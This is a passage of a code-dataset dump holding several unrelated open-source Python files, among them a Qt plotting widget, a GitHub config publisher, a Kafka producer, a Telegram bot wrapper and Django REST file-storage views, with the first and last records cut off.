self.__closest_point(self.pos())\n        if self.__ox_fixation:\n            self.setPos(\n                QtCore.QPointF(self.pos().x(), cp.y())\n            )\n        else:\n            self.setPos(cp)\n\n    def mouseClickEvent(self, ev):\n        if self.moving and ev.button() == QtCore.Qt.MouseButton.RightButton:\n            ev.accept()\n            self.moving = False\n            self.sigPositionChanged.emit(self)\n            self.sigPositionChangeFinished.emit(self)\n        elif ev.button() == QtCore.Qt.MouseButton.LeftButton:\n            self.__edit_bound_target_item_widget.metadata = self.__metadata\n            self.__edit_bound_target_item_widget.show()\n\n    def mouseDragEvent(self, ev):\n        if not self.movable or ev.button() != 
QtCore.Qt.MouseButton.LeftButton:\n            return\n        ev.accept()\n        if ev.isStart():\n            self.moving = True\n\n        if not self.moving:\n            return\n\n        pos = self.mapToView(ev.pos())\n        new_pos = self.__closest_point(pos)\n\n        if self.__ox_fixation:\n            self.setPos(\n                QtCore.QPointF(self.pos().x(), new_pos.y())\n            )\n        else:\n            self.setPos(new_pos)\n\n        if ev.isFinish():\n            self.moving = False\n            self.sigPositionChangeFinished.emit(self)\n\n    def __update_metadata(self):\n        self.__metadata = self.__edit_bound_target_item_widget.metadata\n\n    def __closest_point(\n        self,\n        point: QtCore.QPointF\n    ) -> QtCore.QPointF:\n        \"\"\"\n        Finds the closest point on the line.\n        \"\"\"\n\n        bottom_closest_y_i, bottom_closest_y_d = 0, float('inf')\n        for i, y in enumerate(self.__curve.yData):\n            if y >= point.y():\n                continue\n            cdy_ = abs(y - point.y())\n            if cdy_ < bottom_closest_y_d:\n                bottom_closest_y_d = cdy_\n                bottom_closest_y_i = i\n\n        upper_closest_y_i, upper_closest_y_d = 0, float('inf')\n        for i, y in reversed(list(enumerate(self.__curve.yData))):\n            if y <= point.y():\n                continue\n            cdy_ = abs(y - point.y())\n            if cdy_ < upper_closest_y_d:\n                upper_closest_y_d = cdy_\n                upper_closest_y_i = i\n\n        line_params = get_line_params(\n            Point(self.__curve.xData[bottom_closest_y_i], self.__curve.yData[bottom_closest_y_i]),\n            Point(self.__curve.xData[upper_closest_y_i], self.__curve.yData[upper_closest_y_i]),\n        )\n        x = (-line_params[1] * point.y() - line_params[2]) / line_params[0]\n\n        return QtCore.QPointF(x, point.y())\n\n    @property\n    def curve(self) -> pg.PlotDataItem:\n        return self.__curve\n\n    @property\n    def metadata(self) -> str:\n        return self.__metadata\n\n    @metadata.setter\n    def metadata(self, value):\n        self.__metadata = value\n","repo_name":"kabanpunk/snippets","sub_path":"fastapi+vue/qt_graph/BoundTargetItem.py","file_name":"BoundTargetItem.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"9613014386","text":"import base64\nimport logging\nimport os\nimport sys\n\nimport github\nfrom flask.cli import AppGroup\n\nfrom application.db.models import Collection, PublicationStatus\nfrom application.extensions import db\nfrom application.publish.models import (\n    ColumnModel,\n    CombineModel,\n    ConcatModel,\n    ConvertModel,\n    DefaultModel,\n    DefaultValueModel,\n    EndpointModel,\n    FilterModel,\n    PatchModel,\n    SkipModel,\n    SourceModel,\n    TransformModel,\n)\nfrom application.utils import csv_dict_to_string\n\nlogging.basicConfig(stream=sys.stdout)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\npublish_cli = AppGroup(\"publish\")\n\n\nPUBLISH_MODEL_CLASSES = {\n    \"column\": ColumnModel,\n    \"combine\": CombineModel,\n    \"concat\": ConcatModel,\n    \"convert\": ConvertModel,\n    \"default\": DefaultModel,\n    \"default_model\": DefaultValueModel,\n    \"patch\": PatchModel,\n    \"skip\": SkipModel,\n    \"transform\": TransformModel,\n    \"filter\": FilterModel,\n}\n\n\n@publish_cli.command(\"changes\")\ndef publish_config():\n    app_id = os.getenv(\"GITHUB_APP_ID\")\n    private_key = base64.b64decode(os.getenv(\"GITHUB_APP_PRIVATE_KEY\")).decode(\"utf-8\")\n    branch = os.getenv(\"CONFIG_REPO_BRANCH\")\n\n    g = github.GithubIntegration(app_id, private_key)\n    token = g.get_access_token(g.get_installation(\"digital-land\", \"config\").id).token\n    gh = github.Github(login_or_token=token)\n    repo = gh.get_repo(\"digital-land/config\")\n\n    for collection in Collection.query.order_by(Collection.name).all():\n        if collection.publication_status == 
PublicationStatus.DRAFT:\n            logger.info(f\"Publish sources and endpoints for {collection.collection}\")\n            _publish_collection_config(collection, repo, branch)\n            collection.publication_status = PublicationStatus.PUBLISHED\n            db.session.add(collection)\n            db.session.commit()\n        else:\n            logger.info(f\"Collection {collection.collection} has no updates to publish\")\n\n        if collection.pipeline.publication_status == PublicationStatus.DRAFT:\n            logger.info(f\"Publish rules for pipeline {collection.pipeline.pipeline}\")\n            _publish_pipeline_config(collection.pipeline, repo, branch)\n            collection.pipeline.publication_status = PublicationStatus.PUBLISHED\n            db.session.add(collection)\n            db.session.commit()\n        else:\n            logger.info(\n                f\"Pipeline {collection.pipeline.pipeline} has no updates to publish\"\n            )\n\n\ndef _publish_collection_config(collection, repo, branch_name):\n    branch = repo.get_branch(branch_name)\n    branch_sha = branch.commit.sha\n    base_tree = repo.get_git_tree(sha=branch_sha)\n\n    sources = []\n    for source in collection.sources:\n        sources.append(SourceModel.from_orm(source).dict(by_alias=True))\n\n    data = csv_dict_to_string(sources)\n    blob = repo.create_git_blob(data, \"utf-8\")\n\n    path = f\"collection/{collection.collection}/source.csv\"\n    source_element = github.InputGitTreeElement(\n        path=path, mode=\"100644\", type=\"blob\", sha=blob.sha\n    )\n\n    endpoints = []\n    for endpoint in collection.endpoints:\n        endpoints.append(EndpointModel.from_orm(endpoint).dict(by_alias=True))\n\n    data = csv_dict_to_string(endpoints)\n    blob = repo.create_git_blob(data, \"utf-8\")\n\n    path = f\"collection/{collection.collection}/endpoint.csv\"\n    endpoint_element = github.InputGitTreeElement(\n        path=path, mode=\"100644\", type=\"blob\", sha=blob.sha\n    )\n\n    tree = repo.create_git_tree([source_element, endpoint_element], base_tree)\n    parent = repo.get_git_commit(sha=branch_sha)\n    message = f\"Commit update of sources for {collection.collection}\"\n    commit = repo.create_git_commit(message, tree, [parent])\n    branch_refs = repo.get_git_ref(f\"heads/{branch_name}\")\n    branch_refs.edit(sha=commit.sha)\n    logger.info(f\"Committed collection config - commit sha: {commit.sha}\")\n\n\ndef _publish_pipeline_config(pipeline, repo, branch_name):\n    branch = repo.get_branch(branch_name)\n    branch_sha = branch.commit.sha\n    base_tree = repo.get_git_tree(sha=branch_sha)\n    elements = []\n\n    for rule_type, rules in pipeline.get_pipeline_rules().items():\n        if rules:\n            to_publish = []\n            publish_model = PUBLISH_MODEL_CLASSES.get(rule_type, None)\n            if publish_model is None:\n                logger.info(\n                    f\"Can't publish rule type {rule_type}. 
No model defined yet\"\n                )\n                continue\n\n            logger.info(f\"Publish {len(rules)} {rule_type} rules\")\n            for rule in rules:\n                to_publish.append(publish_model.from_orm(rule).dict(by_alias=True))\n\n            data = csv_dict_to_string(to_publish)\n            blob = repo.create_git_blob(data, \"utf-8\")\n\n            path = f\"pipeline/{pipeline.pipeline}/{rule_type}.csv\"\n            element = github.InputGitTreeElement(\n                path=path, mode=\"100644\", type=\"blob\", sha=blob.sha\n            )\n            elements.append(element)\n        else:\n            logger.info(f\"No {rule_type} to publish for {pipeline.pipeline}\")\n\n    if elements:\n        tree = repo.create_git_tree(elements, base_tree)\n        parent = repo.get_git_commit(sha=branch_sha)\n        message = f\"Commit update of pipeline config for {pipeline.pipeline}\"\n        commit = repo.create_git_commit(message, tree, [parent])\n        branch_refs = repo.get_git_ref(f\"heads/{branch_name}\")\n        branch_refs.edit(sha=commit.sha)\n        logger.info(\n            f\"Committed pipeline {pipeline.pipeline} config - commit sha: {commit.sha}\"\n        )\n","repo_name":"digital-land/config-manager","sub_path":"application/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"44294670458","text":"class Ejecutor:\n    def matar(self, proceso):\n        if proceso['prioridad']==3 and proceso['consumo'] > 100:\n            print('EjecutorNivel1 will kill process %s' % proceso['nombre'])\n        elif proceso['prioridad']==2 and proceso['consumo'] > 100:\n            print('EjecutorNivel2 will kill process %s' % proceso['nombre'])\n        elif proceso['prioridad']==1 and proceso['consumo'] > 100:\n            print('EjecutorNivel3 will kill process %s' % proceso['nombre'])\n\ndef main():\n    proceso = {\n        \"prioridad\" : 2,\n        \"nombre\" : \"Test process\",\n        \"consumo\" : 101\n    }\n    en = Ejecutor()\n    en.matar(proceso)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"ulima-is2/pygames","sub_path":"repaso1/is2_ep/pregunta1.py","file_name":"pregunta1.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"37880282203","text":"import sys\nimport os\nimport unittest\ntry:\n    from StringIO import StringIO\nexcept ImportError:\n    from io import StringIO\n\nsys.path.append(\n    os.path.abspath(os.path.dirname(\n        os.path.dirname(\n            __file__))))\n\nimport g4funcs as g4\n\n\nclass TestParseFasta(unittest.TestCase):\n\n    def setUp(self):\n        self.fasta_file = g4.FastaReader(StringIO('''\n>1\nATGTGTGAGTGTGTGAGTGTGTGTTTAGTGTTGAGAGT\nAGTAGTGAGTGTGCGCGGGAGAGTGTCGGTAGTGTGTG\nGATAGATAAGCTACGCATCAGCACATTATTATATATAT\nGGGGCAGCGAGCAGCAGTCAGCATAGCATCAGCATCAG\nAGTAGTCAG\n>2\nGGCATCGACTACGATGACGACATCGACTATCAGCATAC\nGACTAGCATCAGCAGCTACGCTAGGACTAGATCAGCAT\nCGTGCACGACTGATAGACTACGCTACGATCAGCT\n>3test\nGCATCAGCATCGATACTATTTATTATATATATTATATA\nGATAGCTATCTACTATATCATTAATATATT\n'''.strip()))\n        self.seqs = [\n            'ATGTGTGAGTGTGTGAGTGTGTGTTTAGTGTTGAGAGT'\n            'AGTAGTGAGTGTGCGCGGGAGAGTGTCGGTAGTGTGTG'\n            'GATAGATAAGCTACGCATCAGCACATTATTATATATAT'\n            'GGGGCAGCGAGCAGCAGTCAGCATAGCATCAGCATCAG'\n            'AGTAGTCAG',\n            'GGCATCGACTACGATGACGACATCGACTATCAGCATAC'\n            'GACTAGCATCAGCAGCTACGCTAGGACTAGATCAGCAT'\n            'CGTGCACGACTGATAGACTACGCTACGATCAGCT',\n            'GCATCAGCATCGATACTATTTATTATATATATTATATA'\n            'GATAGCTATCTACTATATCATTAATATATT'\n        ]\n        self.seq_ids = ['1', '2', '3test']\n\n    def test_parse_fasta(self):\n        fasta_iter = self.fasta_file.parse_fasta()\n        for test_id, test_seq in zip(self.seq_ids, self.seqs):\n            parsed_id, parsed_seq = next(fasta_iter)\n            self.assertEqual(test_id, parsed_id)\n            
self.assertEqual(test_seq, parsed_seq)\n        with self.assertRaises(StopIteration):\n            next(fasta_iter)\n\n\nclass TestSortBed(unittest.TestCase):\n\n    def setUp(self):\n        unsorted_bed = [\n            u'1\\t100\\t200\\ttest\\t10\\t-',\n            u'1\\t0\\t100\\ttest\\t10\\t+',\n            u'1\\t150\\t250\\ttest\\t10\\t-',\n            u'2\\t150\\t250\\ttest\\t10\\t-',\n            u'1\\t120\\t220\\ttest\\t10\\t+',\n            u'1\\t10\\t110\\ttest\\t10\\t-',\n            u'2\\t120\\t220\\ttest\\t10\\t-',\n        ]\n        with g4.BedWriter() as bed:\n            for r in unsorted_bed:\n                bed.write(r)\n        self.unsorted_bed_fn = bed.fn\n        self.sorted_bed = [\n            u'1\\t0\\t100\\ttest\\t10\\t+',\n            u'1\\t10\\t110\\ttest\\t10\\t-',\n            u'1\\t100\\t200\\ttest\\t10\\t-',\n            u'1\\t120\\t220\\ttest\\t10\\t+',\n            u'1\\t150\\t250\\ttest\\t10\\t-',\n            u'2\\t120\\t220\\ttest\\t10\\t-',\n            u'2\\t150\\t250\\ttest\\t10\\t-',\n        ]\n\n    def test_sort_bed(self):\n        sorted_output = list(g4.sort_bed_file(self.unsorted_bed_fn))\n        self.assertEqual(sorted_output, self.sorted_bed)\n","repo_name":"mparker2/g4predict","sub_path":"tests/g4fileutils_test.py","file_name":"g4fileutils_test.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"}
{"seq_id":"43033450509","text":"from django.urls import path, include\nfrom . import views\nfrom django.conf.urls import url\n\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('beers/', views.beer_list, name='beer_list'),\n    path('beers/tag/<str:tag>/', views.beer_list, name='beer_list_by_tag'),\n    path('beer/<int:pk>', views.beer_detail, name='beer-detail'),\n    path('add_beer/', views.beer_create, name='beer_create'),\n    path('edit_beer/<int:pk>', views.beer_edit, name='beer_edit'),\n    path('delete_beer/<int:pk>', views.beer_delete, name='beer_delete'),\n    path('like', views.like_beer, name='like_beer'),\n    path('likes/<str:username>/', views.user_likes, name='user_likes'),\n    path('users/<str:username>/', views.user_profile, name='user_profile'),\n    path('delete_review/<int:pk>', views.review_delete, name='review_delete'),\n\n]\n","repo_name":"LWilsonDev/beer-list","sub_path":"beer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"30719418687","text":"from confluent_kafka import Producer\nimport json\n\n# Kafka producer configuration\n_CONF = {\n    'bootstrap.servers': 'localhost:9092',  # Replace with your Kafka broker(s) address\n    'client.id': 'my-producer'\n}\n\n\ndef get_producer():\n    return Producer(_CONF)\n\n\ndef send_json_message(topic, json_data):\n    producer = get_producer()\n    try:\n        # Produce the JSON message to the specified topic\n        producer.produce(topic, key=None, value=json.dumps(json_data))\n        producer.flush()  # Ensure all messages are sent\n\n        print(f\"Sent JSON message to topic {topic}: {json_data}\")\n    except Exception as e:\n        print(f\"Error sending message: {str(e)}\")\n","repo_name":"jahandaniyal/kafka-poc","sub_path":"kafka_producer.py","file_name":"kafka_producer.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"2060363251","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom os import environ\n\nfrom telegram.ext import Updater, MessageHandler, CommandHandler, \\\n    Filters, CallbackQueryHandler, ConversationHandler, \\\n    InlineQueryHandler\n\n# Activity logging\nimport logging\n\n\nclass BotTelegram:\n    \"\"\"Base class for creating Telegram Bot instances\n\n    >>> MiBot = 
BotTelegram(token)\n\n    \"\"\"\n    PORT = environ.get('PORT', 5000)\n\n    def __init__(self, token, webhook=False, url=''):\n        self.updater = Updater(token=token, use_context=True)\n        # Dispatcher: keeps track of every chat window the bot is in.\n        self.dispatcher = self.updater.dispatcher\n        if webhook:\n            self.updater.start_webhook(listen=\"0.0.0.0\",\n                                       port=int(self.PORT),\n                                       url_path=token)\n            self.updater.bot.setWebhook(url + str(token))\n        else:\n            self.updater.start_polling()\n\n    def wait_for_command(self, command, function):\n        self.dispatcher.add_handler(CommandHandler(command, function))\n\n    def answer_query_with(self, function, pattern=None):\n        self.dispatcher.add_handler(CallbackQueryHandler(function, pattern=pattern))\n\n    def answer_message_with(self, funcion):\n        self.dispatcher.add_handler(MessageHandler(Filters.text & (~Filters.command), funcion))\n\n    def answer_inline_mode(self, command, pattern=None):\n        self.dispatcher.add_handler(InlineQueryHandler(command, pattern=pattern))\n\n    def generate_user_id(self, update):\n        try:\n            chat_id = update.callback_query.message.chat_id\n        except AttributeError:\n            try:\n                chat_id = update.message.chat_id\n            except AttributeError:\n                try:\n                    chat_id = update.inline_query.from_user.id\n                except AttributeError:\n                    chat_id = update.callback_query.from_user.id\n        return chat_id\n\n    def generate_message_id(self, update):\n        try:\n            message_id = update.callback_query.message.message_id\n        except AttributeError:\n            try:\n                message_id = update.message.message_id\n            except AttributeError:\n                try:\n                    message_id = update.inline_query.from_user.message_id\n                except AttributeError:\n                    message_id = update.callback_query.inline_message_id\n        return message_id\n","repo_name":"lucianomartinez27/crypto-alerter","sub_path":"src/bot_telegram/bot_telegram.py","file_name":"bot_telegram.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"1477144353","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn\nimport string\nfrom scipy.optimize import curve_fit\n\n\nclass Plot:\n    FIGURE_QUALITY_MAP = {\n        1: dict(figsize=(6, 4), dpi=120),\n        2: dict(figsize=(12, 9), dpi=150),\n        3: dict(figsize=(16, 9), dpi=250),\n    }\n\n    def __init__(self, parameters={}):\n        self.parameters = parameters\n        self._setup_style()\n        self._setup_figure()\n\n    def _setup_style(self):\n        seaborn.set()\n        plt.rc(\"text\", usetex=True)\n        plt.rc(\"font\", family=\"serif\")\n        plt.rc(\"xtick\", labelsize=\"x-small\")\n        plt.rc(\"ytick\", labelsize=\"x-small\")\n\n    def _setup_figure(self):\n        figure_parameters = self._get_figure_parameters()\n        plt.figure(**figure_parameters)\n\n    def _plot_observations(self, X, Y, label, err):\n        label_observation = f\"{label} (Observation)\"\n        plt.errorbar(X, Y, yerr=err, fmt=\"o\", label=label_observation)\n        # plt.scatter(X, Y, label=label)\n\n    def _get_fit_label(self, base_label, fit_parameters):\n        string_reprs = []\n        for index, value in enumerate(fit_parameters):\n            letter = string.ascii_lowercase[index]\n            value_repr = f\"{value:.5f}\"\n            string_reprs.append(f\"{letter}={value_repr}\")\n        string_repr = \", \".join(string_reprs)\n        label = f\"{base_label} (Fit - {string_repr})\"\n        return label\n\n    def _plot_fit(self, X, Y, fit_fn, label):\n        parameters, _ = curve_fit(fit_fn, X, Y)\n\n        label = self._get_fit_label(label, parameters)\n        X_fit = np.linspace(min(X), max(X), 100)\n        print(parameters)\n        print(fit_fn(X_fit, *parameters))\n        plt.plot(X_fit, fit_fn(X_fit, *parameters), \"--\", 
label=label)\n\n def _add_labels(self, xlabel, ylabel):\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n\n def _add_legend(self):\n plt.legend()\n\n def _add_title(self, title):\n plt.title(title.format(**self.parameters))\n\n def _save_to_file(self, filename):\n plt.savefig(filename)\n\n def _get_figure_parameters(self):\n if self.figure_quality in self.FIGURE_QUALITY_MAP:\n return self.FIGURE_QUALITY_MAP[self.figure_quality]\n raise ValueError\n\n def plot(self, X, Y, label, fit_fn=None, err=None):\n self._plot_observations(X, Y, label, err)\n if fit_fn:\n self._plot_fit(X, Y, fit_fn, label)\n\n def save(self):\n\n self._add_labels(self.xlabel, self.ylabel)\n self._add_title(self.title)\n self._add_legend()\n self._save_to_file(self.filename)\n","repo_name":"alansammarone/musk","sub_path":"musk/core/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7069912552","text":"import pandas as pd\nfrom pathlib import Path\n\n\ndef wrangle_in_files(file, suffix, ubo_subject_ids=False):\n if file.suffix == \".xlsx\":\n df = pd.read_excel(file)\n elif file.suffix == \".tsv\":\n df = pd.read_csv(file, sep=\"\\t\")\n else:\n raise Exception\n\n if ubo_subject_ids:\n df.insert(0, \"session_id\", df.ID.str[9:])\n df.insert(0, \"subject_id\", df.ID.str[:9])\n df.drop(columns=[\"ID\"], inplace=True)\n else:\n df.rename(columns={\"subject\": \"subject_id\", \"session\": \"session_id\"}, inplace=True)\n\n rep = {c: f\"{c}{suffix}\" for c in df.drop(columns=[\"subject_id\", \"session_id\"]).columns}\n df.rename(columns=rep, inplace=True)\n\n df_metadata = pd.DataFrame([], columns=[\"subject_id\", \"session_id\", \"missing\", \"missing_text\"])\n df_metadata[\"subject_id\"] = df[\"subject_id\"]\n df_metadata[\"session_id\"] = df[\"session_id\"]\n df_metadata[\"missing\"] = 0\n\n return df, df_metadata\n\n\nin_dir = Path(\"/Volumes/lhab_public/03_Data/06_DataConversion/01_DataPreparation/10_Neuroimaging/01_wrangling/01_wmh\")\nout_dir = Path(\n \"/Volumes/lhab_public/03_Data/06_DataConversion/01_DataPreparation/10_Neuroimaging/05_ready_2_convert/01_wmh\")\nout_dir.mkdir(exist_ok=True, parents=True)\n\nfile = in_dir / \"WMH_UBO_spreadsheet_2D_fulldata_Tp6.xlsx\"\ndf, df_metadata = wrangle_in_files(file, suffix=\"_ubo2d_orig\", ubo_subject_ids=True)\ndf.to_excel(out_dir / \"lhab_wmh_ubo2d_orig_data.xlsx\", index=False)\ndf_metadata.to_excel(out_dir / \"lhab_wmh_ubo2d_orig_metadata.xlsx\", index=False)\n\nfile = in_dir / \"WMH_UBO_spreadsheet_3D_all_Tp5.xlsx\"\ndf, df_metadata = wrangle_in_files(file, suffix=\"_ubo3d_orig\", ubo_subject_ids=True)\ndf.to_excel(out_dir / \"lhab_wmh_ubo3d_orig_data.xlsx\", index=False)\ndf_metadata.to_excel(out_dir / \"lhab_wmh_ubo3d_orig_metadata.xlsx\", index=False)\n\natlases = [\"JHUlabels\", \"JHUtracts\", \"hoCort\", \"hoSubcort\", \"oxThal\"]\nsuffix_lut = {\"lacunes\": \"_lacunes_parcMNI_{atlas}\", \"wmh\": \"_wmh_ubo2d_parcMNI_{atlas}\"}\n\nfor domain in [\"wmh\", \"lacunes\"]:\n for atlas in atlases:\n file = in_dir / \"MNI/stats\" / domain / f\"{domain}_{atlas}_volume.tsv\"\n suffix = suffix_lut[domain].format(atlas=atlas)\n df, df_metadata = wrangle_in_files(file, suffix=suffix, ubo_subject_ids=False)\n df.to_excel(out_dir / f\"lhab{suffix}_data.xlsx\", index=False)\n df_metadata.to_excel(out_dir / f\"lhab{suffix}_metadata.xlsx\", 
index=False)\n","repo_name":"dynage/lhab_behav","sub_path":"scripts/prepare_for_phenotype/wrangle_WMH.py","file_name":"wrangle_WMH.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7066754492","text":"import mimetypes\nimport tempfile\n\nimport requests\nfrom django.shortcuts import render\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\nfrom fnmatch import fnmatch\nfrom rest_framework import mixins, status, viewsets\nfrom rest_framework.exceptions import NotFound, ParseError\nfrom rest_framework.parsers import MultiPartParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.reverse import reverse\nfrom rest_framework.serializers import ValidationError\nfrom rest_framework.views import APIView, Response\n\nfrom quotas.models import UserQuota\nfrom projects.mixins import allowed_projects_for\nfrom projects.models import Project\nfrom projects.permissions import HasUserAPIKey\nfrom projects.renderers import BinaryFileRenderer\nfrom projects.views import RelatedProjectAPIView\n\nfrom .client import GCSClient\nfrom .serializers import FileSerializer\nfrom .models import File\n\n\nclass StorageAPIView(RelatedProjectAPIView):\n permission_classes = [HasUserAPIKey | IsAuthenticated]\n\n def get_client(self):\n project = self.get_project()\n return GCSClient(project)\n\n\nclass ListFilesView(RelatedProjectAPIView):\n \"\"\"\n View to list all files in the projects container\n \"\"\"\n queryset = File.objects.filter(complete=True)\n permission_classes = [HasUserAPIKey | IsAuthenticated]\n\n @swagger_auto_schema(manual_parameters=[\n openapi.Parameter(\n 'path',\n openapi.IN_QUERY,\n description=\"Path where to list files. 
Can be a glob pattern\",\n type=openapi.TYPE_STRING)\n ],\n responses={\n 200: FileSerializer(many=True),\n 204: openapi.Response('No files'),\n 400:\n openapi.Response('Invalid project or not found')\n })\n def get(self, request, format=None):\n \"\"\"\n Return a list of all files\n \"\"\"\n # TODO Pagination\n project = self.get_project()\n path = request.query_params.get('path', '*')\n clean_path = path.lstrip(\" /\").rstrip()\n prefix = clean_path.split(\"*\")[0]\n files = self.queryset.filter(project=project, path__startswith=prefix)\n response_status = status.HTTP_204_NO_CONTENT if files.first(\n ) is None else status.HTTP_200_OK\n match_files = (f for f in files if fnmatch(f.path, clean_path))\n return Response(FileSerializer(match_files, many=True).data,\n status=response_status)\n\n\nclass UploadFileView(StorageAPIView):\n \"\"\"\n View for uploading a file\n \"\"\"\n\n parser_classes = [MultiPartParser]\n\n manual_parameters = [\n openapi.Parameter('path',\n openapi.IN_FORM,\n description=\"File output path in storage\",\n type=openapi.TYPE_STRING),\n openapi.Parameter('project',\n openapi.IN_QUERY,\n description=\"Project ID\",\n type=openapi.TYPE_STRING),\n openapi.Parameter('file',\n openapi.IN_FORM,\n description=\"File content\",\n type=openapi.TYPE_FILE)\n ]\n responses = {\n 200: FileSerializer,\n 400: openapi.Response('Bad request'),\n }\n\n @swagger_auto_schema(manual_parameters=manual_parameters,\n responses=responses)\n def post(self, request, format=None):\n path = request.data.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n fileobj = request.data.get('file', None)\n if not fileobj:\n raise ParseError(\"'file' missing\")\n metadata = request.data.get('metadata', {})\n project = self.get_project()\n\n file = File.upload_from_file(\n fileobj, \n path=path, \n project=project, \n metadata=metadata\n )\n\n return Response(dict(detail=FileSerializer(file).data),\n status=status.HTTP_200_OK)\n\n\nclass FileView(StorageAPIView):\n\n queryset = File.objects.filter(complete=True)\n\n @swagger_auto_schema(manual_parameters=[\n openapi.Parameter('path',\n openapi.IN_QUERY,\n description=\"File path.\",\n type=openapi.TYPE_STRING)\n ],\n responses={\n 200: FileSerializer(many=False),\n 404: openapi.Response('File not found'),\n })\n def get(self, request, format=None):\n \"\"\"\n Return the content of a file\n \"\"\"\n project = self.get_project()\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n\n file = self.queryset.filter(path=path, project=project).first()\n if file is None:\n return Response(None, status=status.HTTP_404_NOT_FOUND)\n content = FileSerializer(file).data\n return Response(dict(detail=content), status=status.HTTP_200_OK)\n\n def delete(self, request, format=None):\n \"\"\"\n Delete a file.\n \"\"\"\n project = self.get_project()\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n file = self.queryset.filter(path=path, project=project).first()\n if file is None:\n return Response(None, status=status.HTTP_404_NOT_FOUND)\n file.delete()\n return Response(dict(detail='File deleted.'),\n status=status.HTTP_200_OK)\n\n\nclass DownloadFileView(StorageAPIView):\n renderer_classes = (BinaryFileRenderer, )\n\n def get(self, request):\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n project = self.get_project()\n\n try:\n file = File.objects.get(path=path, project=project)\n except 
File.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n with tempfile.NamedTemporaryFile() as tmpfile:\n src = tmpfile.name\n file.download_to_filename(src)\n\n content_disp = 'attachment; filename=\"{file_name}\"'.format(\n file_name=path)\n\n with open(src, 'rb') as fileresponse:\n data = fileresponse.read()\n return Response(\n data,\n headers={'Content-Disposition': content_disp},\n content_type=mimetypes.MimeTypes().guess_type(src)[0])\n\n\nclass CreateResumableUploadView(StorageAPIView):\n manual_parameters = [\n openapi.Parameter('path',\n openapi.IN_QUERY,\n description=\"File path in storage\",\n type=openapi.TYPE_STRING),\n openapi.Parameter('size',\n openapi.IN_QUERY,\n description=\"Total file size in bytes (optional)\",\n type=openapi.TYPE_INTEGER),\n ]\n responses = {\n 200: openapi.Response(\"GCS upload session URL\"),\n 400: openapi.Response(\"Bad request\"),\n }\n\n @swagger_auto_schema(manual_parameters=manual_parameters,\n responses=responses)\n def post(self, request):\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n size = request.query_params.get('size', None)\n if not size:\n raise ParseError(\"'size' missing\")\n else:\n size = int(size)\n metadata = request.data.get('metadata', {})\n\n File.check_quota(request.user, size)\n\n client = self.get_client()\n session_url = client.create_resumable_upload_session(\n to=path, size=size, content_type=request.content_type)\n File.objects.update_or_create(project=self.get_project(),\n path=path,\n defaults={\n 'size': size,\n 'complete': False,\n 'metadata': metadata,\n })\n return Response(dict(session_url=session_url),\n status=status.HTTP_200_OK)\n\n\nclass CheckCompletedFileView(StorageAPIView):\n def post(self, request):\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n\n file = File.objects.filter(project=self.get_project(),\n path=path, \n complete=False,\n ).first()\n if not file:\n return Response(None, status=status.HTTP_404_NOT_FOUND)\n\n file.complete = True\n file.save()\n\n content = FileSerializer(file).data\n return Response(dict(detail=content), status=status.HTTP_200_OK)\n","repo_name":"dymaxionlabs/platform","sub_path":"terra/storage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41183478416","text":"import argparse\nimport collections\nimport concurrent.futures\nimport configparser\nimport datetime\nimport filecmp\nimport hashlib\nimport io\nimport itertools\nimport logging\nimport math\nimport os\nimport pathlib\nimport re\nimport shlex\nimport shutil\nimport struct\nimport subprocess\nimport sys\nimport uuid\nimport wave\nimport zipfile\ntry:\n import numpy\nexcept ImportError:\n sys.exit('Numpy missing! 
